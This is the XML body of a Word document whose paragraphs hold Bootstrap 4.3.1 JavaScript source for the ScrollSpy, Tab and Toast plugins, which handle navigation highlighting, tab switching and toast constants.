    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      if ($link.hasClass(ClassName$8.DROPDOWN_ITEM)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $link.closest(Selector$8.DROPDOWN).find(Selector$8.DROPDOWN_TOGGLE).addClass(ClassName$8.ACTIVE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $link.addClass(ClassName$8.ACTIVE);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// Set triggered link as active</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $link.addClass(ClassName$8.ACTIVE); // Set triggered links parents as active</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        // With both &lt;ul&gt; and &lt;nav&gt; markup a parent is the previous sibling of any nav ancestor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $link.parents(Selector$8.NAV_LIST_GROUP).prev(Selector$8.NAV_LINKS + ", " + Selector$8.LIST_ITEMS).addClass(ClassName$8.ACTIVE); // Handle special case when .nav-link is inside .nav-item</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $link.parents(Selector$8.NAV_LIST_GROUP).prev(Selector$8.NAV_ITEMS).children(Selector$8.NAV_LINKS).addClass(ClassName$8.ACTIVE);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$(this._scrollElement).trigger(Event$8.ACTIVATE, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        relatedTarget: target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_proto._clear = function _clear() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      [].slice.call(document.querySelectorAll(this._selector)).filter(function (node) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return node.classList.contains(ClassName$8.ACTIVE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      }).forEach(function (node) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return node.classList.remove(ClassName$8.ACTIVE);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ScrollSpy._jQueryInterface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data = $(this).data(DATA_KEY$8);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var _config = typeof config === 'object' &amp;&amp; config;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ScrollSpy(this, _config);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(this).data(DATA_KEY$8,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_createClass(ScrollSpy,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VERSION$8;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Default$6;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ScrollSpy;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$(window).on(Event$8.LOAD_DATA_API, function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var scrollSpys = [].slice.call(document.querySelectorAll(Selector$8.DATA_SPY));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    var scrollSpysLength = scrollSpys.length;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    for (var i = scrollSpysLength; i--;) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var $spy = $(scrollSpys[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      ScrollSpy._jQueryInterface.call($spy, $spy.data());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    }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$.fn[NAME$8] = ScrollSpy._jQueryInterface;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$8].Constructor = ScrollSpy;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$8].noConflict = function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $.fn[NAME$8] = JQUERY_NO_CONFLICT$8;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return ScrollSpy._jQueryInterface;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">   */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var NAME$9 = 'tab';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var VERSION$9 = '4.3.1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_KEY$9 = 'bs.tab';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var EVENT_KEY$9 = "." + DATA_KEY$9;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_API_KEY$7 = '.data-api';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var JQUERY_NO_CONFLICT$9 = $.fn[NAME$9];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var Event$9 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HIDE: "hide" + EVENT_KEY$9,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HIDDEN: "hidden" + EVENT_KEY$9,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOW: "show" + EVENT_KEY$9,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOWN: "shown" + EVENT_KEY$9,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CLICK_DATA_API: "click" + EVENT_KEY$9 + DATA_API_KEY$7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ClassName$9 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DROPDOWN_MENU: 'dropdown-menu',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ACTIVE: 'active',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DISABLED: 'disabled',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    FADE: 'fade',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOW: 'show'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Selector$9 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DROPDOWN: '.dropdown',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    NAV_LIST_GROUP: '.nav, .list-group',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    ACTIVE: '.active',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    ACTIVE_UL: '&gt; li &gt; .active',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DATA_TOGGLE: '[data-toggle="tab"], [data-toggle="pill"], [data-toggle="list"]',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DROPDOWN_TOGGLE: '.dropdown-toggle',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    DROPDOWN_ACTIVE_CHILD: '&gt; .dropdown-menu .active'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Tab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Tab(element) {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Tab.prototype;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_proto.show = function show() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/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if (this._element.parentNode &amp;&amp; this._element.parentNode.nodeType === Node.ELEMENT_NODE &amp;&amp; $(this._element).hasClass(ClassName$9.ACTIVE) || $(this._element).hasClass(ClassName$9.DISABLED))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target;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var previous;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var listElement = $(this._element).closest(Selector$9.NAV_LIST_GROUP)[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var selector = Util.getSelectorFromElement(this._element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (listElement) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var itemSelector = listElement.nodeName === 'UL' || listElement.nodeName === 'OL' ? Selector$9.ACTIVE_UL : Selector$9.ACTIVE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        previous = $.makeArray($(listElement).find(itemSelector));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        previous = previous[previous.length - 1];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var hideEvent = $.Event(Event$9.HIDE, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        relatedTarget: this._element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  var showEvent = $.Event(Event$9.SHOW, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        relatedTarget: previous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      if (previous) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(previous).trigger(hideEvent);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$(this._element).trigger(showEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (showEvent.isDefaultPrevented() || hideEvent.isDefaultPrevented())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(selector) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        target = document.querySelector(selector);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this._activate(this._element, listElement);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var complete = function complete() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var hiddenEvent = $.Event(Event$9.HIDDEN, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          relatedTarget: _this._element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var shownEvent = $.Event(Event$9.SHOWN, {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          relatedTarget: previous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(previous).trigger(hiddenEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(_this._element).trigger(shownEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (target) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        this._activate(target, target.parentNode, complete);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complete();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$.removeData(this._element, DATA_KEY$9);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_proto._activate = function _activate(element, container, callback) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r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var activeElements = container &amp;&amp; (container.nodeName === 'UL' || container.nodeName === 'OL') ? $(container).find(Selector$9.ACTIVE_UL) : $(container).children(Selector$9.ACTIVE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var active = activeElements[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var isTransitioning = callback &amp;&amp; active &amp;&amp; $(active).hasClass(ClassName$9.FADE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      var complete = function complete() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        return _this2._transitionComplete(element, active, callback);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if (active &amp;&amp; isTransitioning) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var transitionDuration = Util.getTransitionDurationFromElement(active);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(active).removeClass(ClassName$9.SHOW).one(Util.TRANSITION_END, complete).emulateTransitionEnd(transitionDuration);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complete();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_proto._transitionComplete = function _transitionComplete(element, active, callback) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (active) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        $(active).removeClass(ClassName$9.ACTIVE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var dropdownChild = $(active.parentNode).find(Selector$9.DROPDOWN_ACTIVE_CHILD)[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (dropdownChild) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(dropdownChild).removeClass(ClassName$9.ACTIVE);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(active.getAttribute('role') === 'tab') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          active.setAttribute('aria-selected', false);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$(element).addClass(ClassName$9.ACTIVE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      if (element.getAttribute('role') === 'tab') {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        element.setAttribute('aria-selected', true);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Util.reflow(element);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">      if (element.classList.contains(ClassName$9.FADE)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        element.classList.add(ClassName$9.SHOW);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(element.parentNode &amp;&amp; $(element.parentNode).hasClass(ClassName$9.DROPDOWN_MENU)) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var dropdownElement = $(element).closest(Selector$9.DROPDOWN)[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        if (dropdownElement) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          var dropdownToggleList = [].slice.call(dropdownElement.querySelectorAll(Selector$9.DROPDOWN_TOGGLE));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $(dropdownToggleList).addClass(ClassName$9.ACTIVE);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element.setAttribute('aria-expanded', true);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if (callback) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        callback();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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    Tab._jQueryInterface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$this = $(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">        var data = $this.data(DATA_KEY$9);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Tab(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">          $this.data(DATA_KEY$9,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_createClass(Tab,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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        return VERSION$9;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Tab;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Data Api implementation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$(document).on(Event$9.CLICK_DATA_API, Selector$9.DATA_TOGGLE, function (event) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    event.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    Tab._jQueryInterface.call($(this), 'show');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  });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$.fn[NAME$9] = Tab._jQueryInterface;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  $.fn[NAME$9].Constructor = Tab;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1"/>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  $.fn[NAME$9].noConflict = function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    $.fn[NAME$9] = JQUERY_NO_CONFLICT$9;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    return Tab._jQueryInterface;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Constants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var NAME$a = 'toast';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var VERSION$a = '4.3.1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var DATA_KEY$a = 'bs.toast';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var EVENT_KEY$a = "." + DATA_KEY$a;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var JQUERY_NO_CONFLICT$a = $.fn[NAME$a];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">  var Event$a = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    CLICK_DISMISS: "click.dismiss" + EVENT_KEY$a,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HIDE: "hide" + EVENT_KEY$a,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HIDDEN: "hidden" + EVENT_KEY$a,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOW: "show" + EVENT_KEY$a,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOWN: "shown" + EVENT_KEY$a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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  var ClassName$a = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    FADE: 'fade',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    HIDE: 'hide',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOW: 'show',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
      <w:r>
        <w:t xml:space="preserve">    SHOWING: 'showing'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DefaultType$7 = {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005529F1" w:rsidRDefault="005529F1" w:rsidP="005529F1">
